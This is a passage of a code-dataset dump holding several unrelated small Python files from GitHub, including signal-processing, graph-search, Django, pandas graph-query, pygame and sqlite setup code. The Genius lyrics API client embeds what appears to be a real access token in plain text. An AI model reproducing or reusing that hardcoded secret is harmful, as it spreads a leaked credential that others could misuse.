{'herrmann', 'kaiser', 'ichige'}\n Filter length approximation algorithm.\n\n Returns\n -------\n numtaps : int\n Desired number of filter taps.\n bands : ndarray of floats\n A monotonic sequence containing the band edges.\n amps : ndarray of floats\n Desired gain for each band region.\n weights : ndarray of floats\n Filter design weights.\n\n See Also\n --------\n scipy.signal.remez\n\n \"\"\"\n\n # Make sure the parameters are floating point numpy arrays:\n freqs = asarray(freqs, 'd')\n amps = asarray(amps, 'd')\n rips = asarray(rips, 'd')\n\n # Scale ripples with respect to band amplitudes:\n rips /= (amps+(amps==0.0))\n\n # Normalize input frequencies with respect to sampling frequency:\n freqs /= Hz\n\n # Select filter length approximation algorithm:\n if alg == 'herrmann':\n remlplen = remlplen_herrmann\n elif alg == 'kaiser':\n remlplen = remlplen_kaiser\n elif alg == 'ichige':\n remlplen = remlplen_ichige\n else:\n raise ValueError('Unknown filter length approximation algorithm.')\n\n # Validate inputs:\n if any(freqs > 0.5):\n raise ValueError('Frequency band edges must not exceed the Nyquist frequency.')\n if any(freqs < 0.0):\n raise ValueError('Frequency band edges must be nonnegative.')\n if any(rips < 0.0):\n raise ValueError('Ripples must be nonnegative.')\n if len(amps) != len(rips):\n raise ValueError('Number of amplitudes must equal number of ripples.')\n if len(freqs) != 2*(len(amps)-1):\n raise ValueError('Number of band edges must equal 2*((number of amplitudes)-1)')\n\n # Find the longest filter length needed to implement any of the\n # low-pass or high-pass filters with the specified edges:\n f1 = freqs[0:-1:2]\n f2 = freqs[1::2]\n L = 0\n for 
i in range(len(amps)-1):\n L = max((L,\n remlplen(f1[i], f2[i], rips[i], rips[i+1]),\n remlplen(0.5-f2[i], 0.5-f1[i], rips[i+1], rips[i])))\n\n # Cap the sequence of band edges with the limits of the digital frequency\n # range:\n bands = hstack((0.0, freqs, 0.5))\n\n # The filter design weights correspond to the ratios between the maximum\n # ripple and all of the other ripples:\n weight = max(rips)/rips\n\n return [L, bands, amps, weight]\n","repo_name":"bionet/ted.python","sub_path":"bionet/utils/signal_extras.py","file_name":"signal_extras.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"31433102214","text":"\n# This code implements the best-first search (UCS - Uniform Cost Search) algorithm on a graph\n# to find the lowest-cost path from the start node (start) to the goal (goal).\ngraph = {\n 'S': [('A', 1), ('B', 4)],\n 'A': [('B', 2), ('C', 5), ('G', 12)],\n 'B': [('C', 2)],\n 'C': [('G', 3)],\n 'G': []\n}\ndef path_cost(path):\n total_cost = sum(cost for _, cost in path)\n return total_cost, path[-1][0]\n\ndef UCS(graph, start, goal):\n visited = set()\n queue = [[(start, 0)]]\n while queue:\n queue.sort(key=path_cost)\n path = queue.pop(0)\n node = path[-1][0]\n if node in visited:\n continue\n visited.add(node)\n if node == goal:\n return path\n else:\n adjacent_nodes = graph.get(node, [])\n for (node2, cost) in adjacent_nodes:\n new_path = path + [(node2, cost)]\n queue.append(new_path)\n return None\nsolution = UCS(graph, 'S', 'G')\nif solution:\n print('Solution is', solution)\n print('Cost of Solution is', path_cost(solution)[0])\nelse:\n print('No solution found.')","repo_name":"Abdalrhmanal/Examples_of_artificial_intelligence_principles","sub_path":"UFCS.py","file_name":"UFCS.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"3247537935","text":"''' Module that focuses on extracting contextual data from the genius website to be used on our webpage'''\nimport requests\nimport time\nimport json\n\nclass genius:\n\n def __init__(self):\n self.baseUrl=\"https://api.genius.com\"\n self.CLIENT_ACCESS_TOKEN=\"YT_ZO2npD-RqvQOm9PJQhUXhY0b1Shnht3QqPAIXflUeuTy8_s5OCEdEMSgmfRaY\"\n self.headers={}\n self.artistPath=\"\"\n self.blurb=\"\"\n self.artistTwitter=\"\"\n self.artistInsta=\"\"\n self.artistFb=\"\"\n self.artistImg = \"\"\n self.artistDescription=\"\"\n\n\n def getJson(self,path,params=None,headers=None):\n\n #Joins the base URL with the inputted path\n url=\"/\".join([self.baseUrl,path])\n\n print(url)\n\n #Sets the bearer field with the client access token\n token=\"Bearer {}\".format(self.CLIENT_ACCESS_TOKEN)\n\n #Checks for authorization\n if self.headers:\n self.headers[\"Authorization\"]=token\n else:\n self.headers={\"Authorization\":token}\n\n # Gets the response from the path to the data\n response=requests.get(url=url,params=params,headers=self.headers)\n response.raise_for_status()\n\n return response.json()\n\n def getArtistInfo(self,song):\n\n #Builds the path for the search method\n basePath=\"search?q=\"\n queryPath=basePath+song\n\n #Gets the JSON response of the search result\n songInfo=self.getJson(queryPath)\n self.artistPath=songInfo[\"response\"][\"hits\"][0][\"result\"][\"primary_artist\"][\"api_path\"]\n id=songInfo[\"response\"][\"hits\"][0][\"result\"][\"id\"]\n print(self.artistPath)\n\n #Gets the artist information\n 
self.getArtist(self.artistPath)\n\n\n self.getSong(id)\n\n '''print(self.blurb)\n print(self.artistFb)\n print(self.artistTwitter)\n print(self.artistInsta)\n print(self.artistDescription)\n print(self.artistImg)'''\n\n return self.blurb,self.artistFb,self.artistTwitter,self.artistInsta,self.artistImg,self.artistDescription\n\n\n #Gets the annotation from the chosen song\n def getSong(self,id):\n songPath=\"songs/{}\".format(id)\n self.blurb=self.getJson(songPath)[\"response\"][\"song\"][\"description\"][\"dom\"][\"children\"][0][\"children\"][0]\n\n #Gets artist information\n def getArtist(self,artistPath):\n\n #Gets the response body from the artist path\n artistData=self.getJson(artistPath[1:])[\"response\"][\"artist\"]\n self.artistFb=\"https://www.facebook.com/{}\".format(artistData[\"facebook_name\"])\n self.artistTwitter = \"https://www.twitter.com/{}\".format(artistData[\"twitter_name\"])\n self.artistInsta = \"https://www.instagram.com/{}\".format(artistData[\"instagram_name\"])\n self.artistImg=artistData[\"image_url\"]\n self.artistDescription = artistData[\"description\"][\"dom\"][\"children\"][0][\"children\"][0]\n\n\n\n def getAnnotations(self,id):\n print(self.getJson(id))\n return\n\n\n\n\n\nif __name__==\"__main__\":\n\n #Remember to make the search query a combination of the song name and the artist's name\n GeniusLoader=genius()\n songs=[\"Yellow Coldplay\",\"Thats what I like\",\"Broke Lecrae\",\"Love me now John Legend\"]\n\n for song in songs:\n GeniusLoader.getArtistInfo(song)","repo_name":"ryanluu12345/music-flyer","sub_path":"genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27251037304","text":"from .models import *\nfrom rest_framework import serializers\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"staff:user-detail\")\n\n class Meta:\n model = User\n fields = ('url', 'first_name', 'last_name', 'is_staff', 'is_active', 'email')\n\n\nclass InstitutionSerializer(serializers.HyperlinkedModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"staff:institution-detail\")\n\n class Meta:\n model = Institution\n fields = '__all__'\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Province\n fields = ('id', 'name',)\n\n\nclass TargetSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Target\n fields = ('url', 'name',)\n\n\nclass ItemSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Item\n fields = '__all__'\n","repo_name":"tomeksporczyk/Oddam_w_dobre_rece","sub_path":"staff/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20232162790","text":"# https://leetcode.com/problems/reconstruct-itinerary/submissions/\nfrom typing import List\nfrom collections import defaultdict\nfrom queue import PriorityQueue\n\nclass ReconstructItinerary():\n def findItinerary(self, tickets: List[List[str]], root='JFK') -> List[str]:\n self.map = defaultdict(lambda: PriorityQueue())\n self.flight_list = [root]\n self.convert_to_map(tickets)\n self.get_flight_list()\n return self.flight_list\n\n def convert_to_map(self, tickets):\n for from_airport, to_airport in tickets:\n self.map[from_airport].put(to_airport)\n\n def get_flight_list(self):\n 
next_que = self.map[self.flight_list[0]]\n while not next_que.empty():\n next_airport = next_que.get()\n self.flight_list.append(next_airport)\n next_que = self.map[next_airport]\n","repo_name":"nanvenomous/dataStructuresAlgorithms","sub_path":"python/leetcode/reconstruct_itinerary/reconstruct_itinerary.py","file_name":"reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"10278893968","text":"import pandas as pd\nimport copy\nimport math\nimport random\nimport numpy as np\n\ndef makeQuery(edges_df, query_list, thresh=20):\n subset_df = edges_df[edges_df[\"source\"].isin(query_list) | edges_df[\"target\"].isin(query_list)]\n subset_df = subset_df[subset_df[\"thickness\"]>thresh]\n return subset_df\n\n\ndef filter_nodes(full_df, prev_query, max_nodes=100):\n all_nodes = full_df[\"target\"].tolist() + full_df[\"source\"].tolist()\n all_thickness = (full_df[\"thickness\"].tolist()) * 2\n ranked_df = pd.DataFrame.from_dict({\"node\":all_nodes, \"thickness\":all_thickness})\n ranked_df = ranked_df[~ranked_df[\"node\"].isin(prev_query)] #Remove already-found nodes\n ranked_df = ranked_df.groupby(['node']).agg(max).sort_values(by = 'thickness', ascending=False) #Get maximum thickness edge that node has\n if len(ranked_df.index) > max_nodes: \n passing_nodes = (ranked_df.index.tolist())[:max_nodes] \n #Keep only top X nodes\n full_df = full_df[(full_df[\"source\"].isin(prev_query) & (full_df[\"target\"].isin(passing_nodes) | full_df[\"target\"].isin(prev_query))) | (full_df[\"source\"].isin(passing_nodes) & (full_df[\"target\"].isin(prev_query)))]\n return full_df\n\n\ndef query(G, edges_df, nodes_df, db_df, q, depth):\n user_query = list(q.keys())[0]\n \n # For name queries (accounts for the user selecting multiple IDs)\n if user_query != \"QUERY_ID\":\n query_list = list(q.values())\n query_list = [item for sublist in query_list for item in sublist]\n \n # For ID queries\n else:\n query_list = list(q.values())\n\n if depth==1:\n full_df = makeQuery(edges_df, query_list, thresh=0)\n full_df[\"depth\"]=1\n \n else:\n # Recursively find target nodes\n queried = [] #Already-queried nodes\n targets = copy.deepcopy(query_list)\n full_df_cols = list(edges_df.columns)\n full_df_cols.append(\"depth\")\n full_df = pd.DataFrame(columns = full_df_cols)\n for i in range(depth):\n query_df = makeQuery(edges_df, targets, thresh=20) #pre filter to avoid large networks\n queried.extend(targets)\n query_df[\"depth\"] = i+1\n nodes = np.union1d(query_df[\"target\"].tolist(), query_df[\"source\"].tolist())\n targets = np.setdiff1d(nodes, queried) #Get new nodes to use in the next query\n full_df = full_df.append(query_df)\n\n #Bidirectional edges\n opp_df = full_df.merge(edges_df, left_on=[\"source\", \"target\"], right_on=[\"target\",\"source\"])\n opp_df = opp_df.drop(labels=[\"source_x\",\"target_x\",\"color_x\", \"thickness_x\"], axis=1).rename(columns={\"source_y\":\"source\", \"target_y\":\"target\", \"color_y\":\"color\", \"thickness_y\":\"thickness\"})\n full_df = pd.concat([full_df, opp_df]).drop_duplicates(subset=[\"source\", \"target\"])\n \n # Make query nodes depth = 0, so they're in the center of the visualization\n df_dict = {\"target\":query_list, \"depth\":[0]*len(query_list)}\n zero_rows = pd.DataFrame.from_dict(df_dict)\n \n # Only need the targets, since every node (except for some query nodes) are a target at least once\n targets = full_df[[\"target\", \"depth\"]]\n nodes = 
zero_rows.append(targets)\n sources = full_df[[\"source\", \"depth\"]]\n sources = sources.rename(columns={'source': 'target'})\n nodes = nodes.append(sources)\n nodes = nodes.sort_values('depth').drop_duplicates('target').sort_index()\n nodes_df = nodes_df.drop_duplicates(subset='Id', keep=\"first\")\n nodes = pd.merge(nodes, nodes_df, left_on = \"target\", right_on = \"Id\", how=\"inner\")\n \n # Add synonyms to the nodes\n nodes = nodes.merge(db_df, left_on=\"Id\", right_on=\"id\", how=\"left\")\n nodes[\"name\"] = nodes[\"name\"].fillna(nodes[\"Label\"])\n nodes[\"id\"] = nodes[\"id\"].fillna(nodes[\"Id\"])\n nodes[\"name\"] = nodes[\"name\"].fillna(\"NAN\")\n syn_concat = lambda x: \"%%\".join(x) # Separate each synonym with %%\n \n aggregation_functions = {\n 'Id': 'first',\n 'Label':\"first\",\n \"depth\":\"first\",\n \"KB\":\"first\",\n \"PR\":\"first\",\n \"name\":syn_concat\n }\n \n nodes = nodes.groupby('id').aggregate(aggregation_functions)\n nodes[\"Type\"] = [\"Query\" if x in query_list else \"Direct\"\n for x in nodes['Id']]\n \n # If the user selected multiple IDs, merge them all into one node\n if user_query != \"QUERY_ID\":\n nodes.loc[(nodes.Id.isin(query_list)),'display_id'] = \", \".join(query_list)\n nodes[\"display_id\"] = nodes[\"display_id\"].fillna(nodes[\"Id\"])\n nodes.loc[(nodes.Id.isin(query_list)),'Label']=user_query\n nodes.loc[(nodes.Id.isin(query_list)),'Id']=user_query\n nodes = nodes.drop_duplicates(subset=\"Id\")\n full_df[\"orig_source\"] = full_df[\"source\"]\n full_df[\"orig_target\"] = full_df[\"target\"]\n full_df.loc[(full_df.source.isin(query_list)),'source']=user_query\n full_df.loc[(full_df.target.isin(query_list)),'target']=user_query\n \n else:\n nodes[\"display_id\"] = nodes[\"Id\"]\n full_df[\"orig_source\"] = full_df[\"source\"]\n full_df[\"orig_target\"] = full_df[\"target\"]\n \n syn_concat = lambda x: \"%%\".join(x)\n \n aggregation_functions = { \n \"depth\":\"first\",\n \"PR\":\"first\",\n \"Label\":\"first\",\n \"KB\":\"first\",\n \"display_id\":\"first\",\n \"Type\":\"first\",\n 'name': syn_concat\n }\n \n nodes = nodes.groupby(\"Id\").aggregate(aggregation_functions).reset_index()\n\n full_df = full_df[[\"color\", \"thickness\", \"source\", \"target\", \"orig_source\", \"orig_target\"]]\n full_df[\"color2\"] = full_df[\"color\"] * full_df[\"thickness\"]\n id_concat = lambda x: \"%%\".join(x) # Concat all source and target IDs of merged nodes\n aggregation_functions = {'color2': 'sum','thickness': 'sum', \"orig_source\":id_concat, \"orig_target\":id_concat}\n full_df = full_df.groupby([\"source\", \"target\"]).aggregate(aggregation_functions).reset_index()\n full_df[\"color\"] = full_df[\"color2\"]/full_df[\"thickness\"]\n \n def formatter(sources, targets):\n source_list = sources.split(\"%%\")\n target_list = targets.split(\"%%\")\n file_list = [f\"{source_list[i]}_{target_list[i]}.txt\" for i in range(len(source_list))]\n files = \"%%\".join(file_list)\n return files\n \n full_df[\"files\"] = full_df.apply(lambda x: formatter(x.orig_source, x.orig_target), axis=1)\n \n nodes = nodes[[\"Id\", \"Label\", \"depth\", \"KB\", \"display_id\", \"name\", \"Type\"]]\n full_df = full_df[[\"color\", \"thickness\", \n \"files\", \"source\", \"target\"]]\n full_df[\"source_DI\"] = full_df.merge(nodes, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"display_id\"].tolist()\n full_df[\"target_DI\"] = full_df.merge(nodes, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"display_id\"].tolist()\n full_df[\"source_lab\"] = 
full_df.merge(nodes, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n full_df[\"target_lab\"] = full_df.merge(nodes, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n nodes.to_csv(\"nodesTest.csv\", index=False)\n full_df.to_csv(\"full_df_test.csv\", index=False)\n return nodes, full_df\n\n\ndef BIOGRID_query(G, edges_df, nodes_df, q, depth, thresh=20):\n user_query = list(q.keys())[0]\n #edges_df[\"color\"] = 0\n\n query_list = list(q.values())\n \n # If the ID is not found in the BIOGRID nodes...\n if pd.Series(query_list).isin(nodes_df[\"Id\"]).sum() == 0:\n return None, None\n\n if depth == 1:\n qedges_df = makeQuery(edges_df, query_list, thresh=0)\n qedges_df[\"depth\"] = 1\n\n else:\n # Recursively find target nodes\n queried = [] #Already-queried nodes\n targets = copy.deepcopy(query_list)\n qedges_df_cols = list(edges_df.columns)\n qedges_df_cols.append(\"depth\")\n qedges_df = pd.DataFrame(columns = qedges_df_cols)\n for i in range(depth):\n query_df = makeQuery(edges_df, targets, thresh=thresh) #pre filter to avoid large networks\n queried.extend(targets)\n query_df[\"depth\"] = i+1\n qnodes_df = np.union1d(query_df[\"target\"].tolist(), query_df[\"source\"].tolist())\n targets = np.setdiff1d(qnodes_df, queried) #Get new nodes to use in the next query\n qedges_df = qedges_df.append(query_df)\n\n #Bidirectional edges\n opp_df = qedges_df.merge(edges_df, left_on=[\"source\", \"target\"], right_on=[\"target\",\"source\"])\n\n opp_df = opp_df.drop(\n labels=[\"source_x\",\"target_x\",\"thickness_x\"], axis=1\n ).rename(\n columns={\"source_y\":\"source\", \"target_y\":\"target\", \"thickness_y\":\"thickness\"}\n )\n\n qedges_df = pd.concat([qedges_df, opp_df]).drop_duplicates(subset=[\"source\", \"target\"])\n qedges_df[\"color\"] = 0\n\n # Make query nodes depth = 0, so they're in the center of the visualization\n df_dict = {\"target\":query_list, \"depth\":[0]*len(query_list)}\n zero_rows = pd.DataFrame.from_dict(df_dict)\n\n # Only need the targets, since every node (except for some query nodes) are a target at least once\n targets = qedges_df[[\"target\", \"depth\"]]\n qnodes_df = pd.concat([zero_rows, targets])\n\n sources = qedges_df[[\"source\", \"depth\"]]\n sources = sources.rename(columns={'source': 'target'})\n\n qnodes_df = pd.concat([qnodes_df, sources])\n qnodes_df = qnodes_df.sort_values('depth').drop_duplicates('target').sort_index().rename(columns={\"target\": \"Id\"})\n\n qnodes_df[\"KB\"] = \"BIOGRID\"\n\n qnodes_df = qnodes_df.merge(nodes_df, on=\"Id\", how=\"left\") # Get synonyms\n qnodes_df[\"Label\"] = qnodes_df[\"name\"]\n\n syn_concat = lambda x: \"%%\".join(x) # Separate each synonym with %%\n\n aggregation_functions = {\n 'Id': 'first',\n \"Label\": \"first\",\n 'name':\"first\",\n \"depth\":\"first\",\n \"KB\":\"first\",\n \"name\":syn_concat\n }\n\n qnodes_df = qnodes_df.groupby('Id').aggregate(aggregation_functions).reset_index(drop=True)\n\n qnodes_df[\"display_id\"] = qnodes_df[\"Id\"]\n qedges_df[\"color2\"] = qedges_df[\"color\"] * qedges_df[\"thickness\"]\n\n id_concat = lambda x: \"%%\".join(x) # Concat all source and target IDs of merged nodes\n aggregation_functions = {\n 'color2': 'sum',\n 'thickness': 'sum'\n }\n qedges_df = qedges_df.groupby([\"source\", \"target\"]).aggregate(aggregation_functions).reset_index()\n qedges_df[\"color\"] = qedges_df[\"color2\"]/qedges_df[\"thickness\"]\n\n def formatter(sources, targets):\n source_list = sources.split(\"%%\")\n target_list = targets.split(\"%%\")\n 
file_list = [f\"{source_list[i]}_{target_list[i]}.txt\" for i in range(len(source_list))]\n files = \"%%\".join(file_list)\n return files\n\n qedges_df[\"files\"] = qedges_df.apply(lambda x: formatter(x.source, x.target), axis=1)\n\n qnodes_df = qnodes_df[[\"Id\", \"Label\", \"depth\", \"KB\", \"display_id\", \"name\"]]\n qedges_df = qedges_df[[\"color\", \"thickness\", \"files\", \"source\", \"target\"]]\n \n qedges_df[\"source_DI\"] = qedges_df[\"source\"]\n qedges_df[\"target_DI\"] = qedges_df[\"target\"]\n qedges_df[\"source_lab\"] = qedges_df.merge(qnodes_df, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n qedges_df[\"target_lab\"] = qedges_df.merge(qnodes_df, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n return qnodes_df, qedges_df\n","repo_name":"micw42/verit-web","sub_path":"Query/SingleQuery.py","file_name":"SingleQuery.py","file_ext":"py","file_size_in_byte":11265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"74617355246","text":"#Done for now\n\nfrom TextClassifier import *\nimport numpy as np\n\n\ntest_path = './data/train/'\npath = './data/test/'\nmodel = TextClassifier()\n\ndata = model.organize_text(path+'pos/',path+'neg/')\ntests = model.organize_text(test_path+'pos/',test_path+'neg/')\nmodel.init_tokenizer(data['text'])\nX_train = np.array(model.proccess_text(data['text']))\nX_test = np.array(model.proccess_text(tests['text']))\ny_train = data['label']\ny_test = tests['label']\nprint(X_train.shape)\nmodel.train(X_train,y_train,X_test,y_test)\nscores = model.eval(X_test,y_test)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\nimport gc; gc.collect()\n","repo_name":"drewdawg8/MachineLearning","sub_path":"TextTester.py","file_name":"TextTester.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40998841822","text":"#!/usr/bin/env python3\n# coding : utf8\nimport sqlite3\nimport subprocess\nimport os\nimport signal \nimport sys\nimport time\n\nf1 = \"clean.sh\"\nproc = subprocess.Popen(['bash', f1])\n# kill the process after one second \ntime.sleep(1)\nproc.kill()\t\n\n# save the absolute path used to access the database\ndirectory_bdd = os.getcwd()\ndirectory_bdd = directory_bdd + \"/Moteur_stockage.db\"\n\n# save the absolute path used to access the backup database\ndirectory_bdd_backup = os.getcwd() + \"/backups\" + \"/Moteur_stockage_backups.db\"\n\nfile_address_ = os.getcwd()\nfile_address = ''\n\nfor i in file_address_:\n\tif i != file_address_[len(file_address_) - 1]:\n\t\tfile_address = file_address + i\n# save the paths in a file from part 4, so that the server can access them easily\nfile_address = file_address + '4'\nfile_config = file_address + \"/bdd_directory\"\n\nfichier = open(file_config, 'w')\nfichier.write(directory_bdd + ':' + directory_bdd_backup + ':')\nfichier.close()\n\n\ntry:\n\tbdd = sqlite3.connect(directory_bdd)\n\tcurseur = bdd.cursor()\n\t# Table that stores the administrators of the remote servers\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS admin(\n\t\tid_admin INTEGER PRIMARY KEY, \n\t mail VARCHAR(255),\n\t contrainte VARCHAR(8)\n\t)\n\t\"\"\")\n\t# Table that stores alerts from (http://www.cert.ssi.gouv.fr/)\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS alerte(\n\t\tid_alerte INTEGER,\n\t ref_alerte VARCHAR(255) PRIMARY KEY,\n\t title_alerte VARCHAR(255),\n\t\tdate_alerte DATE,\n\t url_alerte TEXT\n\t)\n\t\"\"\")\n\t# Table that stores information about the remote servers\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS sonde(\n\t\tid_sonde INTEGER PRIMARY KEY, \n\t\tmac_address VARCHAR(255),\n\t\tdate_insert DATE,\n\t\tavg_cpu REAL,\n\t\ttmp_cpu REAL,\n\t\tram_total REAL,\n\t\tram_used REAL,\n\t\tswap_total REAL,\n\t\tswap_used REAL,\n\t\tnb_process REAL,\n\t\tuser_connect REAL,\n\t\tcheck_const VARCHAR(10),\n\t\tid_admin INTEGER,\n\t\tdisk_total REAL,\n\t\tdisk_usage REAL,\n\t\tphysical_core INTEGER,\n\t\tlogical_core INTEGER\n\t)\n\t\"\"\")\n\tbdd.commit()\n######################### CREATING A DATABASE FOR RESTORATION #########################\n\tf1 = \"save.sh\"\n\tproc = subprocess.Popen(['bash', f1, directory_bdd, directory_bdd_backup])\n\t# kill the process after one second \n\ttime.sleep(1)\n\tproc.kill()\t\nexcept Exception as e:\n # Roll back if there are errors\n bdd.rollback()\n raise e\nfinally:\n # close the database\n bdd.close()","repo_name":"MessasKouseila/ControllPlatForm","sub_path":"partie2/moteur_stockage.py","file_name":"moteur_stockage.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39984647358","text":"from chromadb.config import Settings\r\nfrom langchain import OpenAI\r\nfrom langchain.embeddings import OpenAIEmbeddings\r\nfrom langchain.vectorstores import Chroma\r\nfrom langchain.chains import ConversationalRetrievalChain\r\nfrom langchain.memory import ConversationBufferMemory\r\nimport os\r\nimport ingestgpt4all\r\n\r\n#Info: This version of LChain uses ChromaDB (ingestcomai.py) to create vectordb with OpenAI Embeddings.\r\nclass comai:\r\n\r\n def __init__(self):\r\n #Define args\r\n persist_directory= \"db\" \r\n os.environ[\"OPENAI_API_KEY\"] = (\"\")\r\n self.chat_history = []\r\n\r\n\r\n # Define the Chroma settings\r\n chroma_settings = Settings(\r\n chroma_db_impl='duckdb+parquet',\r\n persist_directory=persist_directory,\r\n anonymized_telemetry=False\r\n )\r\n\r\n #Setup the rest\r\n embeddings = OpenAIEmbeddings()\r\n self.db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=chroma_settings)\r\n self.memory = ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\r\n self.pdf_qa = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0.05, model_name=\"text-davinci-003\") , self.db.as_retriever(), memory=self.memory)\r\n \r\n\r\n def setupIngestion(self):\r\n ingestgpt4all.embeddings_model_name = \"text-embedding-ada-002\"\r\n\r\n def sendToGPT(self, query):\r\n result = self.pdf_qa({\"question\": query, \"chat_history\": self.chat_history})\r\n self.chat_history.append((query, result['answer']))\r\n print(result['answer']) \r\n return result\r\n\r\n#vvvvv uncomment for test vvvvv \r\n#instance = comai()\r\n#instance.sendToGPT(\"Wie kann ich meinen Anwesenheitsstatus in Teams ändern ?\")\r\n","repo_name":"MertUzeken/AIProject","sub_path":"comai/LChainTest.py","file_name":"LChainTest.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14101287125","text":"from os import listdir, path\nfrom typing import Callable, Dict\nimport pygame\nfrom pygame.surface import Surface\n\nimport config\n\n\n# ----------------------------------------------------------------\n# 
pulls all graphics into a dictionary, key is the png name.\n# value is the pygame image.\ndef generate_images() -> Dict[str, Surface]:\n btn_dict: Dict[str, Surface] = {}\n for file in listdir(config.IMG_DIR):\n f = path.join(config.IMG_DIR, file)\n if path.isfile(f):\n btn_dict[file[:-4]] = pygame.image.load(f).convert_alpha()\n\n # loop scales each image value and resizes.\n btn: str\n for btn in btn_dict.keys():\n if btn[:5] == \"chip_\":\n # scales the chip_btns\n btn_dict[btn] = pygame.transform.scale(\n btn_dict[btn],\n ((config.BUTTON_WIDTH / 5) * 3, (config.BUTTON_HEIGHT / 5) * 3),\n )\n else:\n # scales game buttons\n btn_dict[btn] = pygame.transform.scale(\n btn_dict[btn], (config.BUTTON_WIDTH, config.BUTTON_HEIGHT)\n )\n\n return btn_dict\n\n\nclass Button:\n \"\"\"\n Abstract class, draws the button, checks collide and sets active. Also\n uses a callback function from the first argument in the constructor back\n to the game.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n active: bool,\n ):\n assert callable(on_click)\n self.on_click = on_click\n self.image = [button_up_img, button_down_img]\n self.index = 0\n self.rect = self.image[self.index].get_rect(x=x, y=y)\n self.active = active\n # self.image_change = False\n\n def set_active(self, value: bool) -> None:\n self.active = value\n\n def get_active(self) -> bool:\n return self.active\n\n def draw_button(self, area: Surface) -> None:\n area.blit(self.image[self.index], (self.rect))\n\n def set_index(self, num: int) -> None:\n self.index = num\n\n # x, y are the mouse x, y coords\n def check_collide(self, x: int, y: int) -> bool:\n if self.rect.collidepoint(x, y) and self.get_active():\n self.set_index(1)\n return True\n return False\n\n\nclass Game_button(Button):\n \"\"\"\n Controls the game buttons running along the bottom of the interface.\n Inherits from Button(). Game buttons have 3 images.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n grey_image: Surface,\n active: bool = False,\n ):\n super().__init__(on_click, button_up_img, button_down_img, x, y, active=active)\n self.grey_img = grey_image\n self.image.append(self.grey_img)\n if not self.active:\n self.index = 2\n\n def reset_image(self) -> None:\n if self.get_active():\n self.set_index(0)\n else:\n self.set_index(2)\n\n def click(self) -> None:\n if self.get_active():\n self.on_click()\n\n\nclass Chip_button(Button):\n \"\"\"\n Inherits from Button, this class controls the betting chip buttons.\n Chip buttons have two images.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n value: int,\n ) -> None:\n super().__init__(on_click, button_up_img, button_down_img, x, y, active=True)\n self.value = value\n\n def click(self) -> None:\n if self.get_active():\n self.on_click(self.value)\n\n def reset_image(self) -> None:\n self.set_index(0)\n","repo_name":"GunnerShents/BlackJack","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"1296292544","text":"from django.urls import path\nfrom . 
+{"seq_id":"1296292544","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('', views.PostIndex.as_view(), name='home'),\n    path('new/', views.PostCreate.as_view(), name='developer'),\n    path('posts/', views.PostIndexTwo.as_view(), name='index'),\n    path('posts/<int:pk>/', views.PostDetail.as_view(), name='post_detail'),\n    path('posts/<int:pk>/delete/', views.PostDelete.as_view(), name='post_delete'),\n    path('posts/<int:pk>/update/', views.PostUpdate.as_view(), name='post_update'),\n    path('about/', views.about, name='about'),\n    path('accounts/register/', views.register, name='register')\n]","repo_name":"Avisa-GA/washington-post","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
